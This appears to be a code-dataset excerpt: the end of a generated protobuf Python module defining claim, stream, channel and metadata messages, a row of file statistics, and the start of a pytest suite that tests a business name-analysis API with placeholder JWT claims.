number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tags', full_name='pb.Claim.tags', index=7,
number=11, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='languages', full_name='pb.Claim.languages', index=8,
number=12, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='locations', full_name='pb.Claim.locations', index=9,
number=13, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='type', full_name='pb.Claim.type',
index=0, containing_type=None, fields=[]),
],
serialized_start=20,
serialized_end=319,
)
_STREAM = _descriptor.Descriptor(
name='Stream',
full_name='pb.Stream',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='pb.Stream.source', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='author', full_name='pb.Stream.author', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='license', full_name='pb.Stream.license', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='license_url', full_name='pb.Stream.license_url', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='release_time', full_name='pb.Stream.release_time', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fee', full_name='pb.Stream.fee', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image', full_name='pb.Stream.image', index=6,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='video', full_name='pb.Stream.video', index=7,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='audio', full_name='pb.Stream.audio', index=8,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='software', full_name='pb.Stream.software', index=9,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='type', full_name='pb.Stream.type',
index=0, containing_type=None, fields=[]),
],
serialized_start=322,
serialized_end=582,
)
_CHANNEL = _descriptor.Descriptor(
name='Channel',
full_name='pb.Channel',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='public_key', full_name='pb.Channel.public_key', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='email', full_name='pb.Channel.email', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='website_url', full_name='pb.Channel.website_url', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cover', full_name='pb.Channel.cover', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='featured', full_name='pb.Channel.featured', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=584,
serialized_end=709,
)
_CLAIMREFERENCE = _descriptor.Descriptor(
name='ClaimReference',
full_name='pb.ClaimReference',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='claim_hash', full_name='pb.ClaimReference.claim_hash', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=711,
serialized_end=747,
)
_CLAIMLIST = _descriptor.Descriptor(
name='ClaimList',
full_name='pb.ClaimList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='list_type', full_name='pb.ClaimList.list_type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='claim_references', full_name='pb.ClaimList.claim_references', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_CLAIMLIST_LISTTYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=750,
serialized_end=894,
)
_SOURCE = _descriptor.Descriptor(
name='Source',
full_name='pb.Source',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='hash', full_name='pb.Source.hash', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='pb.Source.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='size', full_name='pb.Source.size', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='media_type', full_name='pb.Source.media_type', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='url', full_name='pb.Source.url', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sd_hash', full_name='pb.Source.sd_hash', index=5,
number=6, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bt_infohash', full_name='pb.Source.bt_infohash', index=6,
number=7, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=896,
serialized_end=1017,
)
_FEE = _descriptor.Descriptor(
name='Fee',
full_name='pb.Fee',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='currency', full_name='pb.Fee.currency', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='address', full_name='pb.Fee.address', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='amount', full_name='pb.Fee.amount', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_FEE_CURRENCY,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1020,
serialized_end=1155,
)
_IMAGE = _descriptor.Descriptor(
name='Image',
full_name='pb.Image',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='width', full_name='pb.Image.width', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='height', full_name='pb.Image.height', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1157,
serialized_end=1195,
)
_VIDEO = _descriptor.Descriptor(
name='Video',
full_name='pb.Video',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='width', full_name='pb.Video.width', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='height', full_name='pb.Video.height', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='duration', full_name='pb.Video.duration', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='audio', full_name='pb.Video.audio', index=3,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1197,
serialized_end=1279,
)
_AUDIO = _descriptor.Descriptor(
name='Audio',
full_name='pb.Audio',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='duration', full_name='pb.Audio.duration', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1281,
serialized_end=1306,
)
_SOFTWARE = _descriptor.Descriptor(
name='Software',
full_name='pb.Software',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='os', full_name='pb.Software.os', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_SOFTWARE_OS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1308,
serialized_end=1416,
)
_LANGUAGE = _descriptor.Descriptor(
name='Language',
full_name='pb.Language',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='language', full_name='pb.Language.language', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='script', full_name='pb.Language.script', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='region', full_name='pb.Language.region', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_LANGUAGE_LANGUAGE,
_LANGUAGE_SCRIPT,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1419,
serialized_end=5202,
)
_LOCATION = _descriptor.Descriptor(
name='Location',
full_name='pb.Location',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='country', full_name='pb.Location.country', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='state', full_name='pb.Location.state', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='city', full_name='pb.Location.city', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='code', full_name='pb.Location.code', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='latitude', full_name='pb.Location.latitude', index=4,
number=5, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='longitude', full_name='pb.Location.longitude', index=5,
number=6, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_LOCATION_COUNTRY,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5205,
serialized_end=10561,
)
_CLAIM.fields_by_name['stream'].message_type = _STREAM
_CLAIM.fields_by_name['channel'].message_type = _CHANNEL
_CLAIM.fields_by_name['collection'].message_type = _CLAIMLIST
_CLAIM.fields_by_name['repost'].message_type = _CLAIMREFERENCE
_CLAIM.fields_by_name['thumbnail'].message_type = _SOURCE
_CLAIM.fields_by_name['languages'].message_type = _LANGUAGE
_CLAIM.fields_by_name['locations'].message_type = _LOCATION
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['stream'])
_CLAIM.fields_by_name['stream'].containing_oneof = _CLAIM.oneofs_by_name['type']
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['channel'])
_CLAIM.fields_by_name['channel'].containing_oneof = _CLAIM.oneofs_by_name['type']
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['collection'])
_CLAIM.fields_by_name['collection'].containing_oneof = _CLAIM.oneofs_by_name['type']
_CLAIM.oneofs_by_name['type'].fields.append(
_CLAIM.fields_by_name['repost'])
_CLAIM.fields_by_name['repost'].containing_oneof = _CLAIM.oneofs_by_name['type']
_STREAM.fields_by_name['source'].message_type = _SOURCE
_STREAM.fields_by_name['fee'].message_type = _FEE
_STREAM.fields_by_name['image'].message_type = _IMAGE
_STREAM.fields_by_name['video'].message_type = _VIDEO
_STREAM.fields_by_name['audio'].message_type = _AUDIO
_STREAM.fields_by_name['software'].message_type = _SOFTWARE
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['image'])
_STREAM.fields_by_name['image'].containing_oneof = _STREAM.oneofs_by_name['type']
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['video'])
_STREAM.fields_by_name['video'].containing_oneof = _STREAM.oneofs_by_name['type']
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['audio'])
_STREAM.fields_by_name['audio'].containing_oneof = _STREAM.oneofs_by_name['type']
_STREAM.oneofs_by_name['type'].fields.append(
_STREAM.fields_by_name['software'])
_STREAM.fields_by_name['software'].containing_oneof = _STREAM.oneofs_by_name['type']
_CHANNEL.fields_by_name['cover'].message_type = _SOURCE
_CHANNEL.fields_by_name['featured'].message_type = _CLAIMLIST
_CLAIMLIST.fields_by_name['list_type'].enum_type = _CLAIMLIST_LISTTYPE
_CLAIMLIST.fields_by_name['claim_references'].message_type = _CLAIMREFERENCE
_CLAIMLIST_LISTTYPE.containing_type = _CLAIMLIST
_FEE.fields_by_name['currency'].enum_type = _FEE_CURRENCY
_FEE_CURRENCY.containing_type = _FEE
_VIDEO.fields_by_name['audio'].message_type = _AUDIO
_SOFTWARE_OS.containing_type = _SOFTWARE
_LANGUAGE.fields_by_name['language'].enum_type = _LANGUAGE_LANGUAGE
_LANGUAGE.fields_by_name['script'].enum_type = _LANGUAGE_SCRIPT
_LANGUAGE.fields_by_name['region'].enum_type = _LOCATION_COUNTRY
_LANGUAGE_LANGUAGE.containing_type = _LANGUAGE
_LANGUAGE_SCRIPT.containing_type = _LANGUAGE
_LOCATION.fields_by_name['country'].enum_type = _LOCATION_COUNTRY
_LOCATION_COUNTRY.containing_type = _LOCATION
DESCRIPTOR.message_types_by_name['Claim'] = _CLAIM
DESCRIPTOR.message_types_by_name['Stream'] = _STREAM
DESCRIPTOR.message_types_by_name['Channel'] = _CHANNEL
DESCRIPTOR.message_types_by_name['ClaimReference'] = _CLAIMREFERENCE
DESCRIPTOR.message_types_by_name['ClaimList'] = _CLAIMLIST
DESCRIPTOR.message_types_by_name['Source'] = _SOURCE
DESCRIPTOR.message_types_by_name['Fee'] = _FEE
DESCRIPTOR.message_types_by_name['Image'] = _IMAGE
DESCRIPTOR.message_types_by_name['Video'] = _VIDEO
DESCRIPTOR.message_types_by_name['Audio'] = _AUDIO
DESCRIPTOR.message_types_by_name['Software'] = _SOFTWARE
DESCRIPTOR.message_types_by_name['Language'] = _LANGUAGE
DESCRIPTOR.message_types_by_name['Location'] = _LOCATION
Claim = _reflection.GeneratedProtocolMessageType('Claim', (_message.Message,), dict(
DESCRIPTOR = _CLAIM,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Claim)
))
_sym_db.RegisterMessage(Claim)
Stream = _reflection.GeneratedProtocolMessageType('Stream', (_message.Message,), dict(
DESCRIPTOR = _STREAM,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Stream)
))
_sym_db.RegisterMessage(Stream)
Channel = _reflection.GeneratedProtocolMessageType('Channel', (_message.Message,), dict(
DESCRIPTOR = _CHANNEL,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Channel)
))
_sym_db.RegisterMessage(Channel)
ClaimReference = _reflection.GeneratedProtocolMessageType('ClaimReference', (_message.Message,), dict(
DESCRIPTOR = _CLAIMREFERENCE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.ClaimReference)
))
_sym_db.RegisterMessage(ClaimReference)
ClaimList = _reflection.GeneratedProtocolMessageType('ClaimList', (_message.Message,), dict(
DESCRIPTOR = _CLAIMLIST,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.ClaimList)
))
_sym_db.RegisterMessage(ClaimList)
Source = _reflection.GeneratedProtocolMessageType('Source', (_message.Message,), dict(
DESCRIPTOR = _SOURCE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Source)
))
_sym_db.RegisterMessage(Source)
Fee = _reflection.GeneratedProtocolMessageType('Fee', (_message.Message,), dict(
DESCRIPTOR = _FEE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Fee)
))
_sym_db.RegisterMessage(Fee)
Image = _reflection.GeneratedProtocolMessageType('Image', (_message.Message,), dict(
DESCRIPTOR = _IMAGE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Image)
))
_sym_db.RegisterMessage(Image)
Video = _reflection.GeneratedProtocolMessageType('Video', (_message.Message,), dict(
DESCRIPTOR = _VIDEO,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Video)
))
_sym_db.RegisterMessage(Video)
Audio = _reflection.GeneratedProtocolMessageType('Audio', (_message.Message,), dict(
DESCRIPTOR = _AUDIO,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Audio)
))
_sym_db.RegisterMessage(Audio)
Software = _reflection.GeneratedProtocolMessageType('Software', (_message.Message,), dict(
DESCRIPTOR = _SOFTWARE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Software)
))
_sym_db.RegisterMessage(Software)
Language = _reflection.GeneratedProtocolMessageType('Language', (_message.Message,), dict(
DESCRIPTOR = _LANGUAGE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Language)
))
_sym_db.RegisterMessage(Language)
Location = _reflection.GeneratedProtocolMessageType('Location', (_message.Message,), dict(
DESCRIPTOR = _LOCATION,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Location)
))
_sym_db.RegisterMessage(Location)
# @@protoc_insertion_point(module_scope)
| 35.613041 | 27,808 | 0.66557 | 21,997 | 167,132 | 4.952175 | 0.118334 | 0.081812 | 0.281127 | 0.161861 | 0.736985 | 0.707655 | 0.672808 | 0.521082 | 0.51942 | 0.491642 | 0 | 0.124192 | 0.184591 | 167,132 | 4,692 | 27,809 | 35.620631 | 0.675134 | 0.004691 | 0 | 0.732626 | 1 | 0.001082 | 0.166488 | 0.134636 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001299 | 0 | 0.001299 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d64b6e44de7348e1caa0a705d760a01d5984abbd | 54,124 | py | Python | api/tests/python/end_points/auto_analyse/protected_names/test_auto_analyse_invalid_np_bc.py | rarmitag/namex | 1b308bf96130619d4a61d44e075cc7ab177dc6cd | [
"Apache-2.0"
] | null | null | null | api/tests/python/end_points/auto_analyse/protected_names/test_auto_analyse_invalid_np_bc.py | rarmitag/namex | 1b308bf96130619d4a61d44e075cc7ab177dc6cd | [
"Apache-2.0"
] | 2 | 2019-01-14T23:59:11.000Z | 2019-01-30T16:09:16.000Z | api/tests/python/end_points/auto_analyse/protected_names/test_auto_analyse_invalid_np_bc.py | rarmitag/namex | 1b308bf96130619d4a61d44e075cc7ab177dc6cd | [
"Apache-2.0"
] | null | null | null | from datetime import date
import pytest
from urllib.parse import quote_plus
import jsonpickle
from namex.constants import EntityTypes
from namex.models import User
from namex.services.name_request.auto_analyse import AnalysisIssueCodes
# from tests.python import integration_oracle_namesdb
token_header = {
"alg": "RS256",
"typ": "JWT",
"kid": "flask-jwt-oidc-test-client"
}
claims = {
"iss": "https://sso-dev.pathfinder.gov.bc.ca/auth/realms/sbc",
"sub": "43e6a245-0bf7-4ccf-9bd0-e7fb85fd18cc",
"aud": "NameX-Dev",
"exp": 31531718745,
"iat": 1531718745,
"jti": "flask-jwt-oidc-test-support",
"typ": "Bearer",
"username": "test-user",
"realm_access": {
"roles": [
"{}".format(User.EDITOR),
"{}".format(User.APPROVER),
"viewer",
"user"
]
}
}
API_BASE_URI = '/api/v1/'
ENDPOINT_PATH = API_BASE_URI + 'name-analysis'
# params = {
# name,
# location, one of: [‘bc’, ‘ca’, ‘us’, or ‘it’],
# entity_type: abbreviation. convention not finalized yet.
# request_type, one of: [‘new’, ‘existing’, ‘continuation’]
# }
@pytest.mark.skip
def assert_issues_count_is(count, issues):
if issues.__len__() > count:
print('\n' + 'Issue types:' + '\n')
for issue in issues:
print('- ' + issue.issueType.value + '\n')
assert issues.__len__() == count
@pytest.mark.skip
def assert_issues_count_is_gt(count, issues):
print('\n' + 'Issue types:' + '\n')
for issue in issues:
print('- ' + issue.get('issue_type') + '\n')
assert issues.__len__() > count
@pytest.mark.skip
def assert_issue_type_is_one_of(types, issue):
assert issue.get('issue_type') in types
@pytest.mark.skip
def assert_has_issue_type(issue_type, issues):
has_issue = False
for issue in issues:
has_issue = True if issue.get('issue_type') == issue_type.value else False
assert has_issue is True
@pytest.mark.skip
def assert_correct_conflict(issue_type, issues, expected):
is_correct = False
for issue in issues:
is_correct = True if issue.get('issue_type') == issue_type.value and " ".join(
value['name'] for value in issue.get('conflicts')) == expected else False
assert is_correct is True
@pytest.mark.skip
def assert_additional_conflict_parameters(issue_type, issues):
is_correct = False
for issue in issues:
is_correct = True if issue.get('issue_type') == issue_type.value and (
value['corp_num'] and value['consumption_date'] for value in issue.get('conflicts')) else False
assert is_correct is True
# IN THIS SECTION TEST VARIOUS ERROR RESPONSES
# Showstoppers
# 1.- Unique word classified as descriptive
@pytest.mark.xfail(raises=ValueError)
def test_add_distinctive_word_base_request_response(client, jwt, app):
words_list_classification = [
{'word': 'CARPENTRY', 'classification': 'DESC'},
{'word': 'HEATING', 'classification': 'DESC'},
{'word': 'ADJUSTERS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{'name': 'CARPENTRY INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{'name': 'HEATING LIMITED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{'name': 'ADJUSTERS LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DISTINCTIVE_WORD, payload.get('issues'))
# 2.- Unique word classified as distinctive
@pytest.mark.xfail(raises=ValueError)
def test_add_descriptive_word_base_request_response(client, jwt, app):
words_list_classification = [{'word': 'COSTAS', 'classification': 'DIST'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'COSTAS INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
